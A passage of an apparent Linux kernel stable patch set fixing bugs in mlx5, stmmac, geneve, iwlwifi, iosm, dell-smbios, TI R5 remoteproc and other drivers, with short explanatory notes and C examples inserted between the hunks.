+ 		mlx5_core_err(dev, "query hca failed\n");
+-		goto reclaim_boot_pages;
++		return err;
+ 	}
+ 	mlx5_start_health_fw_log_up(dev);
+-
+ 	return 0;
+-
+-reclaim_boot_pages:
+-	mlx5_reclaim_startup_pages(dev);
+-err_disable_hca:
+-	mlx5_core_disable_hca(dev, 0);
+-stop_health_poll:
+-	mlx5_stop_health_poll(dev, boot);
+-err_cmd_cleanup:
+-	mlx5_cmd_set_state(dev, MLX5_CMDIF_STATE_DOWN);
+-	mlx5_cmd_cleanup(dev);
+-
+-	return err;
+ }
+ 
+-static int mlx5_function_teardown(struct mlx5_core_dev *dev, bool boot)
++static int mlx5_function_close(struct mlx5_core_dev *dev)
+ {
+ 	int err;
+ 
+@@ -1215,15 +1230,36 @@ static int mlx5_function_teardown(struct mlx5_core_dev *dev, bool boot)
+ 		mlx5_core_err(dev, "tear_down_hca failed, skip cleanup\n");
+ 		return err;
+ 	}
+-	mlx5_reclaim_startup_pages(dev);
+-	mlx5_core_disable_hca(dev, 0);
+-	mlx5_stop_health_poll(dev, boot);
+-	mlx5_cmd_set_state(dev, MLX5_CMDIF_STATE_DOWN);
+-	mlx5_cmd_cleanup(dev);
+ 
+ 	return 0;
+ }
+ 
++static int mlx5_function_setup(struct mlx5_core_dev *dev, bool boot, u64 timeout)
++{
++	int err;
++
++	err = mlx5_function_enable(dev, boot, timeout);
++	if (err)
++		return err;
++
++	err = mlx5_function_open(dev);
++	if (err)
++		mlx5_function_disable(dev, boot);
++	return err;
++}
++
++static int mlx5_function_teardown(struct mlx5_core_dev *dev, bool boot)
++{
++	int err = mlx5_function_close(dev);
++
++	if (!err)
++		mlx5_function_disable(dev, boot);
++	else
++		mlx5_stop_health_poll(dev, boot);
++
++	return err;
++}
++
+ static int mlx5_load(struct mlx5_core_dev *dev)
+ {
+ 	int err;
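
The refactor splits setup into enable/open and teardown into close/disable so each path can unwind exactly the stages that completed (and so the PCI-offline case can skip the device handshake). A hypothetical skeleton of the pairing, with stub stages standing in for the mlx5 calls:

    #include <stdio.h>

    static int  enable_fn(void)  { puts("enable");  return 0; }
    static void disable_fn(void) { puts("disable"); }
    static int  open_fn(void)    { puts("open");    return -1; /* simulate failure */ }
    static int  close_fn(void)   { puts("close");   return 0; }

    static int setup(void)
    {
            int err = enable_fn();
            if (err)
                    return err;
            err = open_fn();
            if (err)
                    disable_fn();   /* unwind only the completed stage */
            return err;
    }

    static int teardown(void)
    {
            int err = close_fn();
            if (!err)
                    disable_fn();   /* skip disable if close failed */
            return err;
    }

    int main(void)
    {
            if (setup()) {
                    puts("setup failed, already unwound");
                    return 1;
            }
            return teardown();
    }

(In the real driver the close-failure path still stops health polling; the stub skips that detail.)
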
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index d33cf8ee7c336..d34aea85f8a69 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -292,10 +292,8 @@ static int ionic_qcq_enable(struct ionic_qcq *qcq)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (qcq->napi.poll)
+-		napi_enable(&qcq->napi);
+-
+ 	if (qcq->flags & IONIC_QCQ_F_INTR) {
++		napi_enable(&qcq->napi);
+ 		irq_set_affinity_hint(qcq->intr.vector,
+ 				      &qcq->intr.affinity_mask);
+ 		ionic_intr_mask(idev->intr_ctrl, qcq->intr.index,
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
+index 390c900832cd2..074ff289eaf25 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
+@@ -343,10 +343,11 @@ static int tc_setup_cbs(struct stmmac_priv *priv,
+ 			struct tc_cbs_qopt_offload *qopt)
+ {
+ 	u32 tx_queues_count = priv->plat->tx_queues_to_use;
++	s64 port_transmit_rate_kbps;
+ 	u32 queue = qopt->queue;
+-	u32 ptr, speed_div;
+ 	u32 mode_to_use;
+ 	u64 value;
++	u32 ptr;
+ 	int ret;
+ 
+ 	/* Queue 0 is not AVB capable */
+@@ -355,30 +356,26 @@ static int tc_setup_cbs(struct stmmac_priv *priv,
+ 	if (!priv->dma_cap.av)
+ 		return -EOPNOTSUPP;
+ 
++	port_transmit_rate_kbps = qopt->idleslope - qopt->sendslope;
++
+ 	/* Port Transmit Rate and Speed Divider */
+-	switch (priv->speed) {
++	switch (div_s64(port_transmit_rate_kbps, 1000)) {
+ 	case SPEED_10000:
+-		ptr = 32;
+-		speed_div = 10000000;
+-		break;
+ 	case SPEED_5000:
+ 		ptr = 32;
+-		speed_div = 5000000;
+ 		break;
+ 	case SPEED_2500:
+-		ptr = 8;
+-		speed_div = 2500000;
+-		break;
+ 	case SPEED_1000:
+ 		ptr = 8;
+-		speed_div = 1000000;
+ 		break;
+ 	case SPEED_100:
+ 		ptr = 4;
+-		speed_div = 100000;
+ 		break;
+ 	default:
+-		return -EOPNOTSUPP;
++		netdev_err(priv->dev,
++			   "Invalid portTransmitRate %lld (idleSlope - sendSlope)\n",
++			   port_transmit_rate_kbps);
++		return -EINVAL;
+ 	}
+ 
+ 	mode_to_use = priv->plat->tx_queues_cfg[queue].mode_to_use;
+@@ -398,10 +395,10 @@ static int tc_setup_cbs(struct stmmac_priv *priv,
+ 	}
+ 
+ 	/* Final adjustments for HW */
+-	value = div_s64(qopt->idleslope * 1024ll * ptr, speed_div);
++	value = div_s64(qopt->idleslope * 1024ll * ptr, port_transmit_rate_kbps);
+ 	priv->plat->tx_queues_cfg[queue].idle_slope = value & GENMASK(31, 0);
+ 
+-	value = div_s64(-qopt->sendslope * 1024ll * ptr, speed_div);
++	value = div_s64(-qopt->sendslope * 1024ll * ptr, port_transmit_rate_kbps);
+ 	priv->plat->tx_queues_cfg[queue].send_slope = value & GENMASK(31, 0);
+ 
+ 	value = qopt->hicredit * 1024ll * 8;
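
With this change the CBS speed divider comes from the qdisc parameters themselves: by 802.1Q credit-based shaping, idleSlope - sendSlope equals the port transmit rate (here in kb/s), so a stale priv->speed can no longer skew the credit math. A worked example for a 100 Mb/s class on a 1 Gb/s port (ptr = 8 at that speed):

    #include <stdio.h>
    #include <stdint.h>

    int main(void)
    {
            int64_t idleslope = 100000;                /* kb/s, from tc    */
            int64_t sendslope = idleslope - 1000000;   /* -900000 kb/s     */
            int64_t rate_kbps = idleslope - sendslope; /* 1000000 = 1 Gb/s */
            int64_t ptr = 8;                           /* divider at 1G    */

            int64_t idle = idleslope * 1024 * ptr / rate_kbps;  /* 819  */
            int64_t send = -sendslope * 1024 * ptr / rate_kbps; /* 7372 */

            printf("rate %lld kb/s, idle_slope %lld, send_slope %lld\n",
                   (long long)rate_kbps, (long long)idle, (long long)send);
            return 0;
    }
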
+diff --git a/drivers/net/geneve.c b/drivers/net/geneve.c
+index 488ca1c854962..c4a49a75250e3 100644
+--- a/drivers/net/geneve.c
++++ b/drivers/net/geneve.c
+@@ -919,6 +919,7 @@ static int geneve_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 			   struct geneve_dev *geneve,
+ 			   const struct ip_tunnel_info *info)
+ {
++	bool inner_proto_inherit = geneve->cfg.inner_proto_inherit;
+ 	bool xnet = !net_eq(geneve->net, dev_net(geneve->dev));
+ 	struct geneve_sock *gs4 = rcu_dereference(geneve->sock4);
+ 	const struct ip_tunnel_key *key = &info->key;
+@@ -930,7 +931,7 @@ static int geneve_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 	__be16 sport;
+ 	int err;
+ 
+-	if (!skb_vlan_inet_prepare(skb))
++	if (!skb_vlan_inet_prepare(skb, inner_proto_inherit))
+ 		return -EINVAL;
+ 
+ 	sport = udp_flow_src_port(geneve->net, skb, 1, USHRT_MAX, true);
+@@ -1003,7 +1004,7 @@ static int geneve_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 	}
+ 
+ 	err = geneve_build_skb(&rt->dst, skb, info, xnet, sizeof(struct iphdr),
+-			       geneve->cfg.inner_proto_inherit);
++			       inner_proto_inherit);
+ 	if (unlikely(err))
+ 		return err;
+ 
+@@ -1019,6 +1020,7 @@ static int geneve6_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 			    struct geneve_dev *geneve,
+ 			    const struct ip_tunnel_info *info)
+ {
++	bool inner_proto_inherit = geneve->cfg.inner_proto_inherit;
+ 	bool xnet = !net_eq(geneve->net, dev_net(geneve->dev));
+ 	struct geneve_sock *gs6 = rcu_dereference(geneve->sock6);
+ 	const struct ip_tunnel_key *key = &info->key;
+@@ -1028,7 +1030,7 @@ static int geneve6_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 	__be16 sport;
+ 	int err;
+ 
+-	if (!skb_vlan_inet_prepare(skb))
++	if (!skb_vlan_inet_prepare(skb, inner_proto_inherit))
+ 		return -EINVAL;
+ 
+ 	sport = udp_flow_src_port(geneve->net, skb, 1, USHRT_MAX, true);
+@@ -1083,7 +1085,7 @@ static int geneve6_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 		ttl = ttl ? : ip6_dst_hoplimit(dst);
+ 	}
+ 	err = geneve_build_skb(dst, skb, info, xnet, sizeof(struct ipv6hdr),
+-			       geneve->cfg.inner_proto_inherit);
++			       inner_proto_inherit);
+ 	if (unlikely(err))
+ 		return err;
+ 
+diff --git a/drivers/net/phy/sfp.c b/drivers/net/phy/sfp.c
+index 9b1403291d921..06dce78d7b0c9 100644
+--- a/drivers/net/phy/sfp.c
++++ b/drivers/net/phy/sfp.c
+@@ -2150,8 +2150,7 @@ static void sfp_sm_module(struct sfp *sfp, unsigned int event)
+ 
+ 	/* Handle remove event globally, it resets this state machine */
+ 	if (event == SFP_E_REMOVE) {
+-		if (sfp->sm_mod_state > SFP_MOD_PROBE)
+-			sfp_sm_mod_remove(sfp);
++		sfp_sm_mod_remove(sfp);
+ 		sfp_sm_mod_next(sfp, SFP_MOD_EMPTY, 0);
+ 		return;
+ 	}
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index a7ae68f490c4c..61224a5a877cb 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -1493,6 +1493,10 @@ static bool vxlan_snoop(struct net_device *dev,
+ 	struct vxlan_fdb *f;
+ 	u32 ifindex = 0;
+ 
++	/* Ignore packets from invalid src-address */
++	if (!is_valid_ether_addr(src_mac))
++		return true;
++
+ #if IS_ENABLED(CONFIG_IPV6)
+ 	if (src_ip->sa.sa_family == AF_INET6 &&
+ 	    (ipv6_addr_type(&src_ip->sin6.sin6_addr) & IPV6_ADDR_LINKLOCAL))
+diff --git a/drivers/net/wireless/ath/ath10k/Kconfig b/drivers/net/wireless/ath/ath10k/Kconfig
+index ca007b800f756..02ca6f8d788d8 100644
+--- a/drivers/net/wireless/ath/ath10k/Kconfig
++++ b/drivers/net/wireless/ath/ath10k/Kconfig
+@@ -44,6 +44,7 @@ config ATH10K_SNOC
+ 	tristate "Qualcomm ath10k SNOC support"
+ 	depends on ATH10K
+ 	depends on ARCH_QCOM || COMPILE_TEST
++	depends on QCOM_RPROC_COMMON || QCOM_RPROC_COMMON=n
+ 	select QCOM_SCM
+ 	select QCOM_QMI_HELPERS
+ 	help
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-drv.c b/drivers/net/wireless/intel/iwlwifi/iwl-drv.c
+index 5eba1a355f043..024c37062a60b 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-drv.c
+@@ -1750,8 +1750,8 @@ struct iwl_drv *iwl_drv_start(struct iwl_trans *trans)
+ err_fw:
+ #ifdef CONFIG_IWLWIFI_DEBUGFS
+ 	debugfs_remove_recursive(drv->dbgfs_drv);
+-	iwl_dbg_tlv_free(drv->trans);
+ #endif
++	iwl_dbg_tlv_free(drv->trans);
+ 	kfree(drv);
+ err:
+ 	return ERR_PTR(ret);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+index 2e3c98eaa400c..668bb9ce293db 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+@@ -91,20 +91,10 @@ void iwl_mvm_mfu_assert_dump_notif(struct iwl_mvm *mvm,
+ {
+ 	struct iwl_rx_packet *pkt = rxb_addr(rxb);
+ 	struct iwl_mfu_assert_dump_notif *mfu_dump_notif = (void *)pkt->data;
+-	__le32 *dump_data = mfu_dump_notif->data;
+-	int n_words = le32_to_cpu(mfu_dump_notif->data_size) / sizeof(__le32);
+-	int i;
+ 
+ 	if (mfu_dump_notif->index_num == 0)
+ 		IWL_INFO(mvm, "MFUART assert id 0x%x occurred\n",
+ 			 le32_to_cpu(mfu_dump_notif->assert_id));
+-
+-	for (i = 0; i < n_words; i++)
+-		IWL_DEBUG_INFO(mvm,
+-			       "MFUART assert dump, dword %u: 0x%08x\n",
+-			       le16_to_cpu(mfu_dump_notif->index_num) *
+-			       n_words + i,
+-			       le32_to_cpu(dump_data[i]));
+ }
+ 
+ static bool iwl_alive_fn(struct iwl_notif_wait_data *notif_wait,
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rs.h b/drivers/net/wireless/intel/iwlwifi/mvm/rs.h
+index b7bc8c1b2ddae..00f04f675cbbb 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rs.h
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rs.h
+@@ -123,13 +123,8 @@ enum {
+ 
+ #define LINK_QUAL_AGG_FRAME_LIMIT_DEF	(63)
+ #define LINK_QUAL_AGG_FRAME_LIMIT_MAX	(63)
+-/*
+- * FIXME - various places in firmware API still use u8,
+- * e.g. LQ command and SCD config command.
+- * This should be 256 instead.
+- */
+-#define LINK_QUAL_AGG_FRAME_LIMIT_GEN2_DEF	(255)
+-#define LINK_QUAL_AGG_FRAME_LIMIT_GEN2_MAX	(255)
++#define LINK_QUAL_AGG_FRAME_LIMIT_GEN2_DEF	(64)
++#define LINK_QUAL_AGG_FRAME_LIMIT_GEN2_MAX	(64)
+ #define LINK_QUAL_AGG_FRAME_LIMIT_MIN	(0)
+ 
+ #define LQ_SIZE		2	/* 2 mode tables:  "Active" and "Search" */
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+index b20d64dbba1ad..a7a29f1659ea6 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+@@ -1298,7 +1298,7 @@ static void iwl_mvm_scan_umac_dwell(struct iwl_mvm *mvm,
+ 		if (IWL_MVM_ADWELL_MAX_BUDGET)
+ 			cmd->v7.adwell_max_budget =
+ 				cpu_to_le16(IWL_MVM_ADWELL_MAX_BUDGET);
+-		else if (params->ssids && params->ssids[0].ssid_len)
++		else if (params->n_ssids && params->ssids[0].ssid_len)
+ 			cmd->v7.adwell_max_budget =
+ 				cpu_to_le16(IWL_SCAN_ADWELL_MAX_BUDGET_DIRECTED_SCAN);
+ 		else
+@@ -1400,7 +1400,7 @@ iwl_mvm_scan_umac_dwell_v11(struct iwl_mvm *mvm,
+ 	if (IWL_MVM_ADWELL_MAX_BUDGET)
+ 		general_params->adwell_max_budget =
+ 			cpu_to_le16(IWL_MVM_ADWELL_MAX_BUDGET);
+-	else if (params->ssids && params->ssids[0].ssid_len)
++	else if (params->n_ssids && params->ssids[0].ssid_len)
+ 		general_params->adwell_max_budget =
+ 			cpu_to_le16(IWL_SCAN_ADWELL_MAX_BUDGET_DIRECTED_SCAN);
+ 	else
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_devlink.c b/drivers/net/wwan/iosm/iosm_ipc_devlink.c
+index 2fe724d623c06..33c5a46f1b922 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_devlink.c
++++ b/drivers/net/wwan/iosm/iosm_ipc_devlink.c
+@@ -210,7 +210,7 @@ static int ipc_devlink_create_region(struct iosm_devlink *devlink)
+ 			rc = PTR_ERR(devlink->cd_regions[i]);
+ 			dev_err(devlink->dev, "Devlink region fail,err %d", rc);
+ 			/* Delete previously created regions */
+-			for ( ; i >= 0; i--)
++			for (i--; i >= 0; i--)
+ 				devlink_region_destroy(devlink->cd_regions[i]);
+ 			goto region_create_fail;
+ 		}
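
The iosm fix is a one-character unwind bug: starting the cleanup loop at the current i would also call devlink_region_destroy() on cd_regions[i], which holds an ERR_PTR rather than a real region. The corrected form skips the failed index:

    #include <stdio.h>

    int main(void)
    {
            int i = 3;      /* regions 0..2 were created; region 3 failed */

            /* Pre-decrement first so the failed slot is never touched */
            for (i--; i >= 0; i--)
                    printf("destroy region %d\n", i);   /* 2, 1, 0 */
            return 0;
    }
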
+diff --git a/drivers/nvme/target/passthru.c b/drivers/nvme/target/passthru.c
+index a0a292d49588c..dc756a1c9d0e3 100644
+--- a/drivers/nvme/target/passthru.c
++++ b/drivers/nvme/target/passthru.c
+@@ -226,13 +226,13 @@ static void nvmet_passthru_execute_cmd_work(struct work_struct *w)
+ 	    req->cmd->common.opcode == nvme_admin_identify) {
+ 		switch (req->cmd->identify.cns) {
+ 		case NVME_ID_CNS_CTRL:
+-			nvmet_passthru_override_id_ctrl(req);
++			status = nvmet_passthru_override_id_ctrl(req);
+ 			break;
+ 		case NVME_ID_CNS_NS:
+-			nvmet_passthru_override_id_ns(req);
++			status = nvmet_passthru_override_id_ns(req);
+ 			break;
+ 		case NVME_ID_CNS_NS_DESC_LIST:
+-			nvmet_passthru_override_id_descs(req);
++			status = nvmet_passthru_override_id_descs(req);
+ 			break;
+ 		}
+ 	} else if (status < 0)
+diff --git a/drivers/pci/controller/pcie-rockchip-ep.c b/drivers/pci/controller/pcie-rockchip-ep.c
+index 0af0e965fb57e..1e3c3192d122c 100644
+--- a/drivers/pci/controller/pcie-rockchip-ep.c
++++ b/drivers/pci/controller/pcie-rockchip-ep.c
+@@ -98,10 +98,8 @@ static int rockchip_pcie_ep_write_header(struct pci_epc *epc, u8 fn, u8 vfn,
+ 
+ 	/* All functions share the same vendor ID with function 0 */
+ 	if (fn == 0) {
+-		u32 vid_regs = (hdr->vendorid & GENMASK(15, 0)) |
+-			       (hdr->subsys_vendor_id & GENMASK(31, 16)) << 16;
+-
+-		rockchip_pcie_write(rockchip, vid_regs,
++		rockchip_pcie_write(rockchip,
++				    hdr->vendorid | hdr->subsys_vendor_id << 16,
+ 				    PCIE_CORE_CONFIG_VENDOR);
+ 	}
+ 
+diff --git a/drivers/platform/x86/dell/dell-smbios-base.c b/drivers/platform/x86/dell/dell-smbios-base.c
+index e61bfaf8b5c48..86b95206cb1bd 100644
+--- a/drivers/platform/x86/dell/dell-smbios-base.c
++++ b/drivers/platform/x86/dell/dell-smbios-base.c
+@@ -11,6 +11,7 @@
+  */
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+ 
++#include <linux/container_of.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/capability.h>
+@@ -25,11 +26,16 @@ static u32 da_supported_commands;
+ static int da_num_tokens;
+ static struct platform_device *platform_device;
+ static struct calling_interface_token *da_tokens;
+-static struct device_attribute *token_location_attrs;
+-static struct device_attribute *token_value_attrs;
++static struct token_sysfs_data *token_entries;
+ static struct attribute **token_attrs;
+ static DEFINE_MUTEX(smbios_mutex);
+ 
++struct token_sysfs_data {
++	struct device_attribute location_attr;
++	struct device_attribute value_attr;
++	struct calling_interface_token *token;
++};
++
+ struct smbios_device {
+ 	struct list_head list;
+ 	struct device *device;
+@@ -416,47 +422,26 @@ static void __init find_tokens(const struct dmi_header *dm, void *dummy)
+ 	}
+ }
+ 
+-static int match_attribute(struct device *dev,
+-			   struct device_attribute *attr)
+-{
+-	int i;
+-
+-	for (i = 0; i < da_num_tokens * 2; i++) {
+-		if (!token_attrs[i])
+-			continue;
+-		if (strcmp(token_attrs[i]->name, attr->attr.name) == 0)
+-			return i/2;
+-	}
+-	dev_dbg(dev, "couldn't match: %s\n", attr->attr.name);
+-	return -EINVAL;
+-}
+-
+ static ssize_t location_show(struct device *dev,
+ 			     struct device_attribute *attr, char *buf)
+ {
+-	int i;
++	struct token_sysfs_data *data = container_of(attr, struct token_sysfs_data, location_attr);
+ 
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EPERM;
+ 
+-	i = match_attribute(dev, attr);
+-	if (i > 0)
+-		return sysfs_emit(buf, "%08x", da_tokens[i].location);
+-	return 0;
++	return sysfs_emit(buf, "%08x", data->token->location);
+ }
+ 
+ static ssize_t value_show(struct device *dev,
+ 			  struct device_attribute *attr, char *buf)
+ {
+-	int i;
++	struct token_sysfs_data *data = container_of(attr, struct token_sysfs_data, value_attr);
+ 
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EPERM;
+ 
+-	i = match_attribute(dev, attr);
+-	if (i > 0)
+-		return sysfs_emit(buf, "%08x", da_tokens[i].value);
+-	return 0;
++	return sysfs_emit(buf, "%08x", data->token->value);
+ }
+ 
+ static struct attribute_group smbios_attribute_group = {
+@@ -473,22 +458,15 @@ static int build_tokens_sysfs(struct platform_device *dev)
+ {
+ 	char *location_name;
+ 	char *value_name;
+-	size_t size;
+ 	int ret;
+ 	int i, j;
+ 
+-	/* (number of tokens  + 1 for null terminated */
+-	size = sizeof(struct device_attribute) * (da_num_tokens + 1);
+-	token_location_attrs = kzalloc(size, GFP_KERNEL);
+-	if (!token_location_attrs)
++	token_entries = kcalloc(da_num_tokens, sizeof(*token_entries), GFP_KERNEL);
++	if (!token_entries)
+ 		return -ENOMEM;
+-	token_value_attrs = kzalloc(size, GFP_KERNEL);
+-	if (!token_value_attrs)
+-		goto out_allocate_value;
+ 
+ 	/* need to store both location and value + terminator*/
+-	size = sizeof(struct attribute *) * ((2 * da_num_tokens) + 1);
+-	token_attrs = kzalloc(size, GFP_KERNEL);
++	token_attrs = kcalloc((2 * da_num_tokens) + 1, sizeof(*token_attrs), GFP_KERNEL);
+ 	if (!token_attrs)
+ 		goto out_allocate_attrs;
+ 
+@@ -496,27 +474,32 @@ static int build_tokens_sysfs(struct platform_device *dev)
+ 		/* skip empty */
+ 		if (da_tokens[i].tokenID == 0)
+ 			continue;
++
++		token_entries[i].token = &da_tokens[i];
++
+ 		/* add location */
+ 		location_name = kasprintf(GFP_KERNEL, "%04x_location",
+ 					  da_tokens[i].tokenID);
+ 		if (location_name == NULL)
+ 			goto out_unwind_strings;
+-		sysfs_attr_init(&token_location_attrs[i].attr);
+-		token_location_attrs[i].attr.name = location_name;
+-		token_location_attrs[i].attr.mode = 0444;
+-		token_location_attrs[i].show = location_show;
+-		token_attrs[j++] = &token_location_attrs[i].attr;
++
++		sysfs_attr_init(&token_entries[i].location_attr.attr);
++		token_entries[i].location_attr.attr.name = location_name;
++		token_entries[i].location_attr.attr.mode = 0444;
++		token_entries[i].location_attr.show = location_show;
++		token_attrs[j++] = &token_entries[i].location_attr.attr;
+ 
+ 		/* add value */
+ 		value_name = kasprintf(GFP_KERNEL, "%04x_value",
+ 				       da_tokens[i].tokenID);
+ 		if (value_name == NULL)
+ 			goto loop_fail_create_value;
+-		sysfs_attr_init(&token_value_attrs[i].attr);
+-		token_value_attrs[i].attr.name = value_name;
+-		token_value_attrs[i].attr.mode = 0444;
+-		token_value_attrs[i].show = value_show;
+-		token_attrs[j++] = &token_value_attrs[i].attr;
++
++		sysfs_attr_init(&token_entries[i].value_attr.attr);
++		token_entries[i].value_attr.attr.name = value_name;
++		token_entries[i].value_attr.attr.mode = 0444;
++		token_entries[i].value_attr.show = value_show;
++		token_attrs[j++] = &token_entries[i].value_attr.attr;
+ 		continue;
+ 
+ loop_fail_create_value:
+@@ -532,14 +515,12 @@ static int build_tokens_sysfs(struct platform_device *dev)
+ 
+ out_unwind_strings:
+ 	while (i--) {
+-		kfree(token_location_attrs[i].attr.name);
+-		kfree(token_value_attrs[i].attr.name);
++		kfree(token_entries[i].location_attr.attr.name);
++		kfree(token_entries[i].value_attr.attr.name);
+ 	}
+ 	kfree(token_attrs);
+ out_allocate_attrs:
+-	kfree(token_value_attrs);
+-out_allocate_value:
+-	kfree(token_location_attrs);
++	kfree(token_entries);
+ 
+ 	return -ENOMEM;
+ }
+@@ -551,12 +532,11 @@ static void free_group(struct platform_device *pdev)
+ 	sysfs_remove_group(&pdev->dev.kobj,
+ 				&smbios_attribute_group);
+ 	for (i = 0; i < da_num_tokens; i++) {
+-		kfree(token_location_attrs[i].attr.name);
+-		kfree(token_value_attrs[i].attr.name);
++		kfree(token_entries[i].location_attr.attr.name);
++		kfree(token_entries[i].value_attr.attr.name);
+ 	}
+ 	kfree(token_attrs);
+-	kfree(token_value_attrs);
+-	kfree(token_location_attrs);
++	kfree(token_entries);
+ }
+ 
+ static int __init dell_smbios_init(void)
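
The dell-smbios rework replaces match_attribute(), a linear name search that also silently dropped token 0 because of its `i > 0` test, with the standard container_of() pattern: embed the attribute in a per-token struct and recover the owner by pointer arithmetic. A minimal userspace rendition with a local container_of():

    #include <stdio.h>
    #include <stddef.h>

    #define container_of(ptr, type, member) \
            ((type *)((char *)(ptr) - offsetof(type, member)))

    struct attr { const char *name; };

    struct token_entry {
            struct attr location_attr;
            struct attr value_attr;
            unsigned int value;
    };

    static unsigned int value_show(struct attr *a)
    {
            /* O(1) recovery of the owning entry, no string matching */
            struct token_entry *e =
                    container_of(a, struct token_entry, value_attr);
            return e->value;
    }

    int main(void)
    {
            struct token_entry e = {
                    { "0001_location" }, { "0001_value" }, 0x1234abcd
            };
            printf("%08x\n", value_show(&e.value_attr));
            return 0;
    }
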
+diff --git a/drivers/ptp/ptp_chardev.c b/drivers/ptp/ptp_chardev.c
+index 9311f3d09c8fc..8eb902fe73a98 100644
+--- a/drivers/ptp/ptp_chardev.c
++++ b/drivers/ptp/ptp_chardev.c
+@@ -84,7 +84,8 @@ int ptp_set_pinfunc(struct ptp_clock *ptp, unsigned int pin,
+ 	}
+ 
+ 	if (info->verify(info, pin, func, chan)) {
+-		pr_err("driver cannot use function %u on pin %u\n", func, chan);
++		pr_err("driver cannot use function %u and channel %u on pin %u\n",
++		       func, chan, pin);
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+diff --git a/drivers/remoteproc/ti_k3_r5_remoteproc.c b/drivers/remoteproc/ti_k3_r5_remoteproc.c
+index 0481926c69752..4919407d422da 100644
+--- a/drivers/remoteproc/ti_k3_r5_remoteproc.c
++++ b/drivers/remoteproc/ti_k3_r5_remoteproc.c
+@@ -98,12 +98,14 @@ struct k3_r5_soc_data {
+  * @dev: cached device pointer
+  * @mode: Mode to configure the Cluster - Split or LockStep
+  * @cores: list of R5 cores within the cluster
++ * @core_transition: wait queue to sync core state changes
+  * @soc_data: SoC-specific feature data for a R5FSS
+  */
+ struct k3_r5_cluster {
+ 	struct device *dev;
+ 	enum cluster_mode mode;
+ 	struct list_head cores;
++	wait_queue_head_t core_transition;
+ 	const struct k3_r5_soc_data *soc_data;
+ };
+ 
+@@ -123,6 +125,7 @@ struct k3_r5_cluster {
+  * @atcm_enable: flag to control ATCM enablement
+  * @btcm_enable: flag to control BTCM enablement
+  * @loczrama: flag to dictate which TCM is at device address 0x0
++ * @released_from_reset: flag to signal when core is out of reset
+  */
+ struct k3_r5_core {
+ 	struct list_head elem;
+@@ -139,6 +142,7 @@ struct k3_r5_core {
+ 	u32 atcm_enable;
+ 	u32 btcm_enable;
+ 	u32 loczrama;
++	bool released_from_reset;
+ };
+ 
+ /**
+@@ -455,6 +459,8 @@ static int k3_r5_rproc_prepare(struct rproc *rproc)
+ 			ret);
+ 		return ret;
+ 	}
++	core->released_from_reset = true;
++	wake_up_interruptible(&cluster->core_transition);
+ 
+ 	/*
+ 	 * Newer IP revisions like on J7200 SoCs support h/w auto-initialization
+@@ -537,7 +543,7 @@ static int k3_r5_rproc_start(struct rproc *rproc)
+ 	struct k3_r5_rproc *kproc = rproc->priv;
+ 	struct k3_r5_cluster *cluster = kproc->cluster;
+ 	struct device *dev = kproc->dev;
+-	struct k3_r5_core *core;
++	struct k3_r5_core *core0, *core;
+ 	u32 boot_addr;
+ 	int ret;
+ 
+@@ -563,6 +569,16 @@ static int k3_r5_rproc_start(struct rproc *rproc)
+ 				goto unroll_core_run;
+ 		}
+ 	} else {
++		/* do not allow core 1 to start before core 0 */
++		core0 = list_first_entry(&cluster->cores, struct k3_r5_core,
++					 elem);
++		if (core != core0 && core0->rproc->state == RPROC_OFFLINE) {
++			dev_err(dev, "%s: can not start core 1 before core 0\n",
++				__func__);
++			ret = -EPERM;
++			goto put_mbox;
++		}
++
+ 		ret = k3_r5_core_run(core);
+ 		if (ret)
+ 			goto put_mbox;
+@@ -608,7 +624,8 @@ static int k3_r5_rproc_stop(struct rproc *rproc)
+ {
+ 	struct k3_r5_rproc *kproc = rproc->priv;
+ 	struct k3_r5_cluster *cluster = kproc->cluster;
+-	struct k3_r5_core *core = kproc->core;
++	struct device *dev = kproc->dev;
++	struct k3_r5_core *core1, *core = kproc->core;
+ 	int ret;
+ 
+ 	/* halt all applicable cores */
+@@ -621,6 +638,16 @@ static int k3_r5_rproc_stop(struct rproc *rproc)
+ 			}
+ 		}
+ 	} else {
++		/* do not allow core 0 to stop before core 1 */
++		core1 = list_last_entry(&cluster->cores, struct k3_r5_core,
++					elem);
++		if (core != core1 && core1->rproc->state != RPROC_OFFLINE) {
